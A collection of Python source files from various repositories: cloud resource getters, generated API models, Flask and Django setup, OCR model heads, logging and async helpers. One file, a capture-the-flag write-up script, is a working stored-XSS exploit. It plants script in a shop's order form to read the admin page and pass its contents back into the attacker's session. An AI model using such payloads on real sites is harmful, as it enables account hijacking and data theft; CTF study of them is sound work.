@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="optimizationType")
def optimization_type(self) -> pulumi.Output[Optional[str]]:
"""
Specifies what scenario the customer wants this CDN endpoint to optimize for, e.g. Download, Media services. With this information, CDN can apply scenario driven optimization.
"""
return pulumi.get(self, "optimization_type")
@property
@pulumi.getter(name="originHostHeader")
def origin_host_header(self) -> pulumi.Output[Optional[str]]:
"""
The host header value sent to the origin with each request. If you leave this blank, the request hostname determines this value. Azure CDN origins, such as Web Apps, Blob Storage, and Cloud Services require this host header value to match the origin hostname by default.
"""
return pulumi.get(self, "origin_host_header")
@property
@pulumi.getter(name="originPath")
def origin_path(self) -> pulumi.Output[Optional[str]]:
"""
A directory path on the origin that CDN can use to retrieve content from, e.g. contoso.cloudapp.net/originpath.
"""
return pulumi.get(self, "origin_path")
@property
@pulumi.getter
def origins(self) -> pulumi.Output[Sequence['outputs.DeepCreatedOriginResponse']]:
"""
The source of the content being delivered via CDN.
"""
return pulumi.get(self, "origins")
@property
@pulumi.getter(name="probePath")
def probe_path(self) -> pulumi.Output[Optional[str]]:
"""
Path to a file hosted on the origin which helps accelerate delivery of the dynamic content and calculate the most optimal routes for the CDN. This is relative to the origin path.
"""
return pulumi.get(self, "probe_path")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
Provisioning status of the endpoint.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="queryStringCachingBehavior")
def query_string_caching_behavior(self) -> pulumi.Output[Optional[str]]:
"""
Defines how CDN caches requests that include query strings. You can ignore any query strings when caching, bypass caching to prevent requests that contain query strings from being cached, or cache every request with a unique URL.
"""
return pulumi.get(self, "query_string_caching_behavior")
@property
@pulumi.getter(name="resourceState")
def resource_state(self) -> pulumi.Output[str]:
"""
Resource status of the endpoint.
"""
return pulumi.get(self, "resource_state")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="webApplicationFirewallPolicyLink")
def web_application_firewall_policy_link(self) -> pulumi.Output[Optional['outputs.EndpointPropertiesUpdateParametersResponseWebApplicationFirewallPolicyLink']]:
"""
Defines the Web Application Firewall policy for the endpoint (if applicable)
"""
return pulumi.get(self, "web_application_firewall_policy_link")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
avg_line_length: 58.277778 | max_line_length: 1,648 | alphanum_fraction: 0.693253

hexsha: 4a27c9fc2b2bc7fd8e819a3deb5b2fd4c4afce93 | size: 198 | ext: py | lang: Python
repo_path: src/typefit/__init__.py | repo_name: Xowap/typefit | repo_head_hexsha: a1beedcc4b05be6d22063719e7e2aa8c3f2c35b3 | licenses: ["WTFPL"]
max_stars_count: 5 (2019-10-28T15:40:03.000Z to 2021-03-16T21:07:25.000Z) | max_issues_count: 32 (2019-10-19T08:40:12.000Z to 2022-01-21T19:07:09.000Z) | max_forks_count: 3 (2019-10-28T15:42:49.000Z to 2022-01-18T19:18:06.000Z)
content:
from . import httpx_models
from .fitting import Fitter, T, typefit
from .meta import meta, other_field
from .reporting import LogErrorReporter, PrettyJson5Formatter
from .serialize import serialize
avg_line_length: 33 | max_line_length: 61 | alphanum_fraction: 0.833333

hexsha: 4a27cc5403be8c0bba8bc65721a0785f3bcc0608 | size: 160 | ext: py | lang: Python
repo_path: app/main/__init__.py | repo_name: koyoo-maxwel/news | repo_head_hexsha: 656166c47a5dc79b9f4b8516153c90a57f808cc9 | licenses: ["MIT"]
max_stars_count: 2 (2019-01-21T09:04:16.000Z to 2019-01-21T09:04:17.000Z) | max_issues_count: null | max_forks_count: 2 (2019-02-17T11:33:28.000Z to 2019-06-24T06:36:43.000Z)
content:
from flask import Blueprint
main = Blueprint('main',__name__)
from . import views
# Here we import the blueprint class from flask to avoid circular dependencies
avg_line_length: 40 | max_line_length: 78 | alphanum_fraction: 0.80625

hexsha: 4a27cc76ff15925a02c05ecf41a293a1c91330b2 | size: 4,000 | ext: py | lang: Python
repo_path: criteo_marketing_transition/models/campaign_bid_change_response_message_with_details.py | repo_name: criteo/criteo-python-marketing-transition-sdk | repo_head_hexsha: d6d19a23d87ab62eb4810f41490cebab9c72882f | licenses: ["Apache-2.0"]
max_stars_count: null | max_issues_count: null | max_forks_count: 1 (2022-02-21T11:16:20.000Z to 2022-02-21T11:16:20.000Z)
content:
# coding: utf-8
"""
Criteo API Transition Swagger
This is used to help Criteo clients transition from MAPI to Criteo API # noqa: E501
The version of the OpenAPI document: 1.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class CampaignBidChangeResponseMessageWithDetails(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'message': 'str',
'details': 'CampaignBidChangeResponse'
}
attribute_map = {
'message': 'message',
'details': 'details'
}
def __init__(self, message=None, details=None): # noqa: E501
"""CampaignBidChangeResponseMessageWithDetails - a model defined in OpenAPI""" # noqa: E501
self._message = None
self._details = None
self.discriminator = None
if message is not None:
self.message = message
if details is not None:
self.details = details
@property
def message(self):
"""Gets the message of this CampaignBidChangeResponseMessageWithDetails. # noqa: E501
:return: The message of this CampaignBidChangeResponseMessageWithDetails. # noqa: E501
:rtype: str
"""
return self._message
@message.setter
def message(self, message):
"""Sets the message of this CampaignBidChangeResponseMessageWithDetails.
:param message: The message of this CampaignBidChangeResponseMessageWithDetails. # noqa: E501
:type: str
"""
self._message = message
@property
def details(self):
"""Gets the details of this CampaignBidChangeResponseMessageWithDetails. # noqa: E501
:return: The details of this CampaignBidChangeResponseMessageWithDetails. # noqa: E501
:rtype: CampaignBidChangeResponse
"""
return self._details
@details.setter
def details(self, details):
"""Sets the details of this CampaignBidChangeResponseMessageWithDetails.
:param details: The details of this CampaignBidChangeResponseMessageWithDetails. # noqa: E501
:type: CampaignBidChangeResponse
"""
self._details = details
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CampaignBidChangeResponseMessageWithDetails):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
avg_line_length: 28.776978 | max_line_length: 102 | alphanum_fraction: 0.60125

hexsha: 4a27cc94c3305c6090718a2fe23e2ddb9a683a18 | size: 225 | ext: py | lang: Python
repo_path: wallet_app/admin.py | repo_name: Vicky-Rathod/django_ewallet_app | repo_head_hexsha: 7f5b6e5f06743225b2ee2e9fcad3ac336d1b3e95 | licenses: ["MIT"]
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
from django.contrib import admin
from .models import Transaction,Type,TopUp,Wallet
# Register your models here.
admin.site.register(Transaction)
admin.site.register(Type)
admin.site.register(TopUp)
admin.site.register(Wallet)
avg_line_length: 32.142857 | max_line_length: 49 | alphanum_fraction: 0.826667

hexsha: 4a27ccdbde4e06290df91bfa14f0e51677f5283b | size: 1,302 | ext: py | lang: Python
repo_path: manage.py | repo_name: Arlington1985/nn_rest_api_example | repo_head_hexsha: c17c61dcbbec4c59ad868293f495c621c533158b | licenses: ["MIT"]
max_stars_count: null | max_issues_count: 1 (2021-10-20T06:34:02.000Z to 2021-10-20T06:34:02.000Z) | max_forks_count: null
content:
#!/usr/bin/env python
# Manager for maintenance works
import os
from flask_script import Manager
from flask_migrate import Migrate, MigrateCommand
from app.db import db
from app import app
from app.models import UserModel, OperationModel
migrate = Migrate(app, db)
manager = Manager(app)
manager.add_command('db', MigrateCommand)
# Creating upload folder
@manager.command
def create_folder():
print(app.root_path)
print(app.instance_path)
print(app.config['BASEDIR'])
final_directory = os.path.join(app.config['BASEDIR'], app.config['UPLOAD_FOLDER'])
if not os.path.exists(final_directory):
os.makedirs(final_directory)
return "Folder with the name {} was created".format(final_directory)
else:
return "Folder with the name {} already exists".format(final_directory)
# Recreating database objects
@manager.command
def recreate_database():
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
print (app.config['SQLALCHEMY_DATABASE_URI'])
engine = create_engine(app.config['SQLALCHEMY_DATABASE_URI'])
Base.metadata.drop_all(engine)
Base.metadata.create_all(engine)
return "Database recreated successfully"
if __name__ == '__main__':
    manager.run()
avg_line_length: 30.27907 | max_line_length: 58 | alphanum_fraction: 0.751152

hexsha: 4a27cd77d62a127951fd75f377c61e0e2e4f7095 | size: 404 | ext: py | lang: Python
repo_path: tests/test_models.py | repo_name: AndreGuerra123/django-portrait | repo_head_hexsha: e777816ca7467ad3f354abe8bcddbdf4ae559bda | licenses: ["MIT"]
max_stars_count: null | max_issues_count: null | max_forks_count: null
content:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_django-portrait
------------
Tests for `django-portrait` models module.
"""
from django.test import TestCase
from django_portrait import models
class TestDjango_portrait(TestCase):
def setUp(self):
self.portrait = models.Portrait()
def test_something(self):
assert self.portrait
def tearDown(self):
pass
avg_line_length: 15.538462 | max_line_length: 42 | alphanum_fraction: 0.655941

hexsha: 4a27ce52a64da5a53d524f58d7613669171d5662 | size: 1,745 | ext: py | lang: Python
repo_path: ppocr/modeling/heads/__init__.py | repo_name: edencfc/PaddleOCR | repo_head_hexsha: 82c5966a642d07f99502d779c70a707fe3edbcb0 | licenses: ["Apache-2.0"]
max_stars_count: 4 (2021-07-29T13:57:22.000Z to 2022-03-21T09:47:53.000Z) | max_issues_count: 1 (2022-02-16T01:37:48.000Z to 2022-02-16T01:37:48.000Z) | max_forks_count: 1 (2021-07-28T15:49:38.000Z to 2021-07-28T15:49:38.000Z)
content:
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = ['build_head']
def build_head(config):
# det head
from .det_db_head import DBHead
from .det_east_head import EASTHead
from .det_sast_head import SASTHead
from .det_pse_head import PSEHead
from .e2e_pg_head import PGHead
# rec head
from .rec_ctc_head import CTCHead
from .rec_att_head import AttentionHead
from .rec_srn_head import SRNHead
from .rec_nrtr_head import Transformer
from .rec_sar_head import SARHead
from .rec_aster_head import AsterHead
# cls head
from .cls_head import ClsHead
#kie head
from .kie_sdmgr_head import SDMGRHead
from .table_att_head import TableAttentionHead
support_dict = [
'DBHead', 'PSEHead', 'EASTHead', 'SASTHead', 'CTCHead', 'ClsHead',
'AttentionHead', 'SRNHead', 'PGHead', 'Transformer',
'TableAttentionHead', 'SARHead', 'AsterHead', 'SDMGRHead'
]
#table head
module_name = config.pop('name')
assert module_name in support_dict, Exception('head only support {}'.format(
support_dict))
module_class = eval(module_name)(**config)
return module_class
avg_line_length: 31.727273 | max_line_length: 80 | alphanum_fraction: 0.719771

hexsha: 4a27cf83e844893e6fe711fd9c82fc8d6280f97f | size: 1,004 | ext: py | lang: Python
repo_path: logs.py | repo_name: shinohe/mst-solution | repo_head_hexsha: 022fdae17d7464680db5cac3b81126d8b782afa8 | licenses: ["MIT"]
max_stars_count: 1 (2019-08-25T03:16:25.000Z to 2019-08-25T03:16:25.000Z) | max_issues_count: null | max_forks_count: 1 (2019-08-25T03:20:07.000Z to 2019-08-25T03:20:07.000Z)
content:
import os
import logging
from logging.handlers import RotatingFileHandler
def not_exist_makedirs(path):
if not os.path.exists(path):
os.makedirs(path)
def init_app(app, log_dir='.'):
formatter = logging.Formatter(
'%(asctime)s %(levelname)s: %(message)s '
'[in %(pathname)s:%(lineno)d]'
)
debug_log = os.path.join(app.root_path, 'logs/debug.log')
not_exist_makedirs(os.path.dirname(debug_log))
debug_file_handler = RotatingFileHandler(
debug_log, maxBytes=100000, backupCount=10
)
debug_file_handler.setLevel(logging.DEBUG)
debug_file_handler.setFormatter(formatter)
app.logger.addHandler(debug_file_handler)
error_log = os.path.join(app.root_path, 'logs/error.log')
not_exist_makedirs(os.path.dirname(error_log))
error_file_handler = RotatingFileHandler(
error_log, maxBytes=100000, backupCount=10
)
error_file_handler.setLevel(logging.ERROR)
error_file_handler.setFormatter(formatter)
app.logger.addHandler(error_file_handler)
app.logger.setLevel(logging.DEBUG)
avg_line_length: 28.685714 | max_line_length: 58 | alphanum_fraction: 0.780876

hexsha: 4a27d297d2fccaf31f5704964f113813cd4f65a7 | size: 1,618 | ext: py | lang: Python
repo_path: Gathered CTF writeups/2017-11-09-defcamp-final/fedora_shop/fedora.py | repo_name: mihaid-b/CyberSakura | repo_head_hexsha: f60e6b6bfd6898c69b84424b080090ae98f8076c | licenses: ["MIT"]
max_stars_count: 1 (2022-03-27T06:00:41.000Z to 2022-03-27T06:00:41.000Z) | max_issues_count: null | max_forks_count: 1 (2022-03-27T06:01:42.000Z to 2022-03-27T06:01:42.000Z)
content:
import re
from time import sleep
import requests
s = requests.session()
session = "XYZ"
def main():
url = "https://fedora-shop.dctf-f1nals-2017.def.camp/complet.php"
telephone_script = """
<script>
window.onload=function(){
eval(document.getElementsByTagName('td')[15].innerText);
};
</script>
"""
address_script = """
xhr = new XMLHttpRequest();
xhr.open('POST','/?action=add&code=wfedora',true);
xhr.withCredentials=true;
document.cookie='PHPSESSID=""" + session + """';
xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xhr.send('quantity='+this.responseText);
"""
other_script = """
xhr = new XMLHttpRequest();
xhr.open('GET','/admin.php');
xhr.onreadystatechange = function() {
if(xhr.readyState === XMLHttpRequest.DONE){
eval(document.getElementsByTagName('td')[14].innerText);
}
};
xhr.send();
"""
params = {"email": "[email protected]",
"telephone": "%s" % telephone_script,
"address": address_script,
"other": other_script,
"ordersum": "1234",
"tprice": "1234"}
s.get("https://fedora-shop.dctf-f1nals-2017.def.camp/index.php?action=remove&code=wfedora",
cookies={"PHPSESSID": session})
sleep(2)
r = s.post(url, data=params, cookies={"PHPSESSID": session})
# print(r.text)
while True:
r = s.get("https://fedora-shop.dctf-f1nals-2017.def.camp/index.php", cookies={"PHPSESSID": session})
result = re.findall('DCTF.*', r.text)
if len(result) > 0:
break
sleep(5)
print(result[0])
main()
avg_line_length: 27.896552 | max_line_length: 108 | alphanum_fraction: 0.61063

hexsha: 4a27d33a80701ecea7ba56b42ba72cad83e7e2c3 | size: 2,377 | ext: py | lang: Python
repo_path: third_party/WebKit/Tools/Scripts/webkitpy/style/checkers/png.py | licenses: ["Apache-2.0", "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause"]
max_stars_repo_name: google-ar/chromium @ 2441c86a5fd975f09a6c30cddb57dfb7fc239699 | max_issues_repo_name / max_forks_repo_name: harrymarkovskiy/WebARonARCore @ 2441c86a5fd975f09a6c30cddb57dfb7fc239699
max_stars_count: 777 (2017-08-29T15:15:32.000Z to 2022-03-21T05:29:41.000Z) | max_issues_count: 66 (2017-08-30T18:31:18.000Z to 2021-08-02T10:59:35.000Z) | max_forks_count: 123 (2017-08-30T01:19:34.000Z to 2022-03-17T22:55:31.000Z)
content:
# Copyright (C) 2012 Balazs Ankes ([email protected]) University of Szeged
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Supports checking WebKit style in png files."""
from webkitpy.common import read_checksum_from_png
from webkitpy.common.system.system_host import SystemHost
class PNGChecker(object):
"""Check svn:mime-type for checking style"""
categories = set(['image/png'])
def __init__(self, file_path, handle_style_error, host=None):
self._file_path = file_path
self._handle_style_error = handle_style_error
self._host = host or SystemHost()
self._fs = self._host.filesystem
def check(self, inline=None):
if self._fs.exists(self._file_path) and self._file_path.endswith("-expected.png"):
with self._fs.open_binary_file_for_reading(self._file_path) as filehandle:
if not read_checksum_from_png.read_checksum(filehandle):
self._handle_style_error(
0, 'image/png', 5,
"Image lacks a checksum. Generate pngs using run-webkit-tests to ensure they have a checksum.")
| 49.520833 | 119 | 0.737484 |
4a27d429ee50a2a206a2f5360772a9005ec3d913 | 4,371 | py | Python | python/async_shared_example.py | Saevon/Recipes | ab8ca9b5244805d545da2dd1d80d249f1ec6057d | [
"MIT"
] | null | null | null | python/async_shared_example.py | Saevon/Recipes | ab8ca9b5244805d545da2dd1d80d249f1ec6057d | [
"MIT"
] | null | null | null | python/async_shared_example.py | Saevon/Recipes | ab8ca9b5244805d545da2dd1d80d249f1ec6057d | [
"MIT"
] | null | null | null | from async_shared import async_handler, sync_shared
# Async Creep
# ------------------------------------------------------------------------------
# Ways to handle it
# Writing Blocking primary code
# * Spin off ProcessPool or ThreadPool
# * But now you cannot get any async benefits (max blocking calls equals the number of threads)
# Writing Async primary code
# * Create a event_loop
# * BUT now you need to import all the async libraries in both cases
# (Ideally it would be optional)
# Writing Both
# * not DRY
# ------------------------------------------------------------------------------
# Example code
#
# Note: 'with' does not work (if you need blocking/async contextmanagers)
import logging

logger = logging.getLogger(__name__)  # used by the ImportError branch below

try:
    import aiofiles
    import asyncio
    import fcntl
except ImportError:
    logger.debug('Async Disabled')

import time
import os
import json
# Polyfill
# Not yet in aiofiles
aiofiles.path = type("AiofilesPathShim", (), {})()  # a bare object() would not accept new attributes
aiofiles.path.exists = aiofiles.os.wrap(os.path.exists)
# ------------------------------------------------------------------------------
# Create the mixed function calls
@async_handler
def sys_random(num_bytes):
return os.urandom(num_bytes)
@sys_random.register_async
async def sys_random_async(num_bytes):
async with aiofiles.open('/dev/urandom', 'rb') as rand_fh:
# Pretend its that easy to open a non-blocking file :)
rand_fh.non_blocking = True
while True:
data = await rand_fh.read(num_bytes)
if len(data) >= num_bytes:
return data
await asyncio.sleep(0.1)
@async_handler
def os_exists(path):
return os.path.exists(path)
@os_exists.register_async
async def os_exists_async(path):
return aiofiles.path.exists(path)
@async_handler
def sys_sleep(seconds):
time.sleep(seconds)
@sys_sleep.register_async
async def sys_sleep_async(seconds):
await asyncio.sleep(seconds)
class AsyncableFile():
def __init__(self, filename, mode):
self.filename = filename
self.mode = mode
self.fh = None
def _open_if_needed(self):
if self.fh:
return
self.fh = open(self.filename, self.mode)
async def _open_if_needed_async(self):
if self.fh:
return
self.fh = await aiofiles.open(self.filename, self.mode)
@async_handler
def read(self):
self._open_if_needed()
return self.fh.read()
@read.register_async
async def read_async(self):
await self._open_if_needed_async()
return await self.fh.read()
@async_handler
def close(self):
if self.fh:
self.fh.close()
@close.register_async
async def close_async(self):
if self.fh:
await self.fh.close()
# --------------------------------------------------------------------------------------------------
@sync_shared
def read_id(filepath):
if not (yield os_exists(filepath)):
raise Exception("File doesn't exist")
    # Decomposed "with" block, since it's not supported here
file = AsyncableFile(filepath, 'r')
try:
raw_data = yield file.read()
finally:
yield file.close()
# END Decomposed
print(raw_data)
data = json.loads(raw_data)
keyid = data.get('id', None)
assert isinstance(keyid, int)
return keyid
@sync_shared
def main(filepath):
''' '''
print('sleeping')
yield sys_sleep(0.1)
keyid = (yield read_id.aevent(filepath))
folder = os.path.dirname(filepath)
keyfile = os.path.join(folder, 'keyfile_{}.json'.format(keyid))
print(keyfile)
if not (yield os_exists(keyfile)):
raise Exception("No Keyfile exists")
print('sleeping')
yield sys_sleep(0.1)
# Pretend we do something with that keyfile
print((yield sys_random(4)))
# Example traceback
'''
Traceback (most recent call last):
File "main.py", line 257, in <module>
main('tmp.txt')
File "async_shared.py", line 56, in wrapper_sync
event = coroutine.send(result)
File "main.py", line 246, in main
raise Exception("No Keyfile exists")
'''
if __name__ == '__main__':
print('========')
print("Synchronous")
main('tmp.txt')
print('========')
print("Asynchronous")
loop = asyncio.get_event_loop()
try:
loop.run_until_complete(main.run_async('tmp.txt'))
finally:
loop.close()
| 22.884817 | 100 | 0.602837 |
4a27d47bff0ebcade592252aa76fda0ff4829b3c | 2,616 | py | Python | test/test_phones_and_emails.py | PaulRumyantsev/python_QA | 3d6809e49c2522da8cd912d2fe6f790df4293f5d | [
"Apache-2.0"
] | null | null | null | test/test_phones_and_emails.py | PaulRumyantsev/python_QA | 3d6809e49c2522da8cd912d2fe6f790df4293f5d | [
"Apache-2.0"
] | null | null | null | test/test_phones_and_emails.py | PaulRumyantsev/python_QA | 3d6809e49c2522da8cd912d2fe6f790df4293f5d | [
"Apache-2.0"
] | null | null | null |
import re
from model.contacts import Contacts
from random import randrange
def test_phones_on_home_page(app):
if app.contacts.count() == 0:
app.contacts.create(Contacts(firstname="test"))
index = randrange(len(app.contacts.get_contacts_list()))
contact_from_home_page = app.contacts.get_contacts_list()[index]
contact_from_edit_page = app.contacts.get_contact_info_from_edit_page(index)
assert contact_from_home_page.firstname == contact_from_edit_page.firstname
assert contact_from_home_page.lastname == contact_from_edit_page.lastname
assert contact_from_home_page.address == contact_from_edit_page.address
assert contact_from_home_page.all_phones_from_home_page == merge_phones_like_on_home_page(contact_from_edit_page)
assert contact_from_home_page.all_emails_from_home_page == merge_emails_on_home_page(contact_from_edit_page)
#def test_emails_on_home_page(app):
#if app.contacts.count() == 0:
#app.contacts.create(Contacts(firstname="test"))
#contact_from_home_page = app.contacts.get_contacts_list()[0]
#contact_from_edit_page = app.contacts.get_contact_info_from_edit_page(0)
#assert contact_from_home_page.all_emails_from_home_page == merge_emails_on_home_page(contact_from_edit_page)
#def test_phones_on_contacts_view_page(app):
#contacts_from_view_page = app.contacts.get_contacts_from_view_page(0)
#contacts_from_edit_page = app.contacts.get_contact_info_from_edit_page(0)
#assert contacts_from_view_page.homephone == contacts_from_edit_page.homephone
#assert contacts_from_view_page.workphone == contacts_from_edit_page.workphone
#assert contacts_from_view_page.mobilephone == contacts_from_edit_page.mobilephone
#assert contacts_from_view_page.fax == contacts_from_edit_page.fax
#assert contacts_from_view_page.secondaryphone == contacts_from_edit_page.secondaryphone
def clear(s):
    return re.sub("[() -]", "", s)
def merge_phones_like_on_home_page(contacts):
return "\n".join(filter(lambda x: x != "",
map(lambda x: clear(x),
filter(lambda x: x is not None,
[contacts.homephone, contacts.mobilephone,
contacts.workphone, contacts.secondaryphone]))))
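# Illustration (hypothetical values, not from the original tests): with
# homephone="(495) 123-45-67", mobilephone="", workphone=None and
# secondaryphone="8 800 2000 600", the helper above returns
# "4951234567\n88002000600".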
def merge_emails_on_home_page(contacts):
return "\n".join(filter(lambda x: x != "",
map(lambda x: clear(x),
filter(lambda x: x is not None,
                                       [contacts.email, contacts.email2, contacts.email3]))))
| 50.307692 | 117 | 0.72133 |
4a27d47fa8742ccda2129af5468bf5b89ca295d9 | 335 | py | Python | apps/manager/purpleserver/manager/migrations/0008_remove_shipment_doc_images.py | rcknr/purplship-server | f8ec35af3da870fada0e989c20a8349c958c637c | [
"ECL-2.0",
"Apache-2.0"
] | 12 | 2020-02-03T08:11:21.000Z | 2021-04-13T02:00:38.000Z | apps/manager/purpleserver/manager/migrations/0008_remove_shipment_doc_images.py | rcknr/purplship-server | f8ec35af3da870fada0e989c20a8349c958c637c | [
"ECL-2.0",
"Apache-2.0"
] | 9 | 2020-02-12T00:25:08.000Z | 2021-04-20T10:31:59.000Z | apps/manager/purpleserver/manager/migrations/0008_remove_shipment_doc_images.py | rcknr/purplship-server | f8ec35af3da870fada0e989c20a8349c958c637c | [
"ECL-2.0",
"Apache-2.0"
] | 7 | 2020-02-03T08:10:50.000Z | 2021-04-13T15:17:12.000Z |
# Generated by Django 3.1.7 on 2021-03-14 03:34
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('manager', '0007_merge_20210311_1428'),
]
operations = [
migrations.RemoveField(
model_name='shipment',
name='doc_images',
),
]
| 18.611111 | 48 | 0.6 |
4a27d4a7f4a2c4087aac72a3f2bc8857b71627b3 | 1,567 | py | Python | homeassistant/components/lightwave/__init__.py | itewk/home-assistant | 769cf19052f8c9ef374d8ba8ae7705ccc7bf4cf4 | [
"Apache-2.0"
] | 23 | 2017-11-15T21:03:53.000Z | 2021-03-29T21:33:48.000Z | homeassistant/components/lightwave/__init__.py | itewk/home-assistant | 769cf19052f8c9ef374d8ba8ae7705ccc7bf4cf4 | [
"Apache-2.0"
] | 9 | 2022-01-27T06:32:10.000Z | 2022-03-31T07:07:51.000Z | homeassistant/components/lightwave/__init__.py | itewk/home-assistant | 769cf19052f8c9ef374d8ba8ae7705ccc7bf4cf4 | [
"Apache-2.0"
] | 10 | 2018-01-01T00:12:51.000Z | 2021-12-21T23:08:05.000Z |
"""Support for device connected via Lightwave WiFi-link hub."""
from lightwave.lightwave import LWLink
import voluptuous as vol
from homeassistant.const import CONF_HOST, CONF_LIGHTS, CONF_NAME, CONF_SWITCHES
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.discovery import async_load_platform
LIGHTWAVE_LINK = "lightwave_link"
DOMAIN = "lightwave"
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
vol.All(
cv.has_at_least_one_key(CONF_LIGHTS, CONF_SWITCHES),
{
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_LIGHTS, default={}): {
cv.string: vol.Schema({vol.Required(CONF_NAME): cv.string})
},
vol.Optional(CONF_SWITCHES, default={}): {
cv.string: vol.Schema({vol.Required(CONF_NAME): cv.string})
},
},
)
)
},
extra=vol.ALLOW_EXTRA,
)
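# Illustration (assumption, not part of the original file): a configuration.yaml
# snippet this schema accepts, with made-up host and device IDs:
#   lightwave:
#     host: 192.168.1.12
#     lights:
#       R1D1:
#         name: Lounge Lamp
#     switches:
#       R2D1:
#         name: Fan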
async def async_setup(hass, config):
"""Try to start embedded Lightwave broker."""
host = config[DOMAIN][CONF_HOST]
hass.data[LIGHTWAVE_LINK] = LWLink(host)
lights = config[DOMAIN][CONF_LIGHTS]
if lights:
hass.async_create_task(
async_load_platform(hass, "light", DOMAIN, lights, config)
)
switches = config[DOMAIN][CONF_SWITCHES]
if switches:
hass.async_create_task(
async_load_platform(hass, "switch", DOMAIN, switches, config)
)
return True
| 29.018519 | 83 | 0.608168 |
4a27d53a4e44a1de396d94429584682d940f9b3e | 80 | py | Python | src/atcoder/score.py | competitive-programming-helper/atcoder-api | 2e90b73349ad30a35a944e546b96af3eef75706b | [
"MIT"
] | 1 | 2022-02-09T07:35:28.000Z | 2022-02-09T07:35:28.000Z | src/atcoder/score.py | competitive-programming-helper/atcoder-api | 2e90b73349ad30a35a944e546b96af3eef75706b | [
"MIT"
] | 3 | 2022-02-02T04:39:08.000Z | 2022-02-07T23:40:14.000Z | src/atcoder/score.py | competitive-programming-helper/atcoder-api | 2e90b73349ad30a35a944e546b96af3eef75706b | [
"MIT"
] | null | null | null |
import requests
def _get_my_score_page() -> requests.models.Response:
...
| 13.333333 | 53 | 0.7125 |
4a27d696a65d060ffb78249514d2eb95ca41870c | 3,087 | py | Python | .history/src/data/data_20191018141404.py | bkraft4257/kaggle_titanic | f29ea1773773109a867278c001dbd21a9f7b21dd | [
"MIT"
] | null | null | null | .history/src/data/data_20191018141404.py | bkraft4257/kaggle_titanic | f29ea1773773109a867278c001dbd21a9f7b21dd | [
"MIT"
] | null | null | null | .history/src/data/data_20191018141404.py | bkraft4257/kaggle_titanic | f29ea1773773109a867278c001dbd21a9f7b21dd | [
"MIT"
] | null | null | null |
import pandas as pd
from typing import Union
from pathlib import Path
from nameparser import HumanName
class ExtractData:
title_translator = {
"Mlle.": "Mrs.",
"Mme.": "Mrs.",
